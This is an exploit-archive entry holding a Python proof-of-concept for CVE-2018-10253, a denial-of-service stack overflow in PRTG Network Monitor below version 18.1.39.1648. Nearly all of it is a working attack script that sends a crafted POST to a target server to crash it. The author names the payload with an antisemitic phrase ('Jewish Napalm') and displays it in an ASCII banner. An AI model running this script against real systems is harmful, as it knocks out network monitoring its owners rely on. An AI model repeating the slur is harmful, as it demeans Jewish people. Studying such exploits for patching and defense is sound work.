PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)

Properties

Published:
24.04.2018
Target:
PRTG Network Monitor < 18.1.39.1648

Code

# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow
# Date: 2018-04-21
# Exploit Author: Lucas "luriel" Carmo
# Vendor Homepage: https://www.paessler.com/prtg
# Software Link: https://www.paessler.com/download/prtg-download
# Version: 18.1.39.1648
# CVE : CVE-2018-10253
# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5
# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/
 
#!/usr/bin/python
 
import requests
import sys
import os
import re
import socket
 
green = "\033[1;32m"
yellow = '\033[1;33m'
normal = '\033[0;0m'
banner = """
     ██╗███████╗██╗    ██╗██╗███████╗██╗  ██╗    ███╗   ██╗ █████╗ ██████╗  █████╗ ██╗     ███╗   ███╗
     ██║██╔════╝██║    ██║██║██╔════╝██║  ██║    ████╗  ██║██╔══██╗██╔══██╗██╔══██╗██║     ████╗ ████║
     ██║█████╗  ██║ █╗ ██║██║███████╗███████║    ██╔██╗ ██║███████║██████╔╝███████║██║     ██╔████╔██║
██   ██║██╔══╝  ██║███╗██║██║╚════██║██╔══██║    ██║╚██╗██║██╔══██║██╔═══╝ ██╔══██║██║     ██║╚██╔╝██║
╚█████╔╝███████╗╚███╔███╔╝██║███████║██║  ██║    ██║ ╚████║██║  ██║██║     ██║  ██║███████╗██║ ╚═╝ ██║
 ╚════╝ ╚══════╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝  ╚═╝    ╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝     ╚═╝  ╚═╝╚══════╝╚═╝     ╚═╝
"""
 
 
banner2 = """
                                            Author: @Lucas "luriel" Carmo
"""
 
os.system('clear')
 
print(green+banner)
print(yellow+banner2)
print(normal)
 
def check_http(url):
    pattern = re.compile("http://")
    return re.search(pattern, url)
 
def sanitize_url(url):
    if(not check_http(url)):
        return "http://" + url
    return url
 
def check_server(url):
    r = requests.get(url, timeout=4)
    code = r.status_code
 
def send_jewish_payload(url):
    payload = {'file':'addmap.htm'}
    r = requests.post(url, params=payload)
 
def main():
    try:
        if len(sys.argv) <= 3 and len (sys.argv) >= 2:
            try:
                url = sanitize_url(sys.argv[1])
                print(' [#] LOADING!')
                if (check_server(url) != 404):
                    send_jewish_payload(url)
                else:
                    print(' [!] Server shutdown or not found')
            except requests.exceptions.ConnectionError:
                print(' [~] BOOOOOM! PRTG Server has been exploded!')
            except requests.exceptions.InvalidURL:
                print(' [!] Invalid URL')
            except requests.exceptions.Timeout:
                print(' [!] Connection Timeout\n')
        else:
            print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')
    except KeyboardInterrupt:
        print(' [!] Jewish Napalm Canceled;.....[./]')
if __name__ == '__main__':
    main()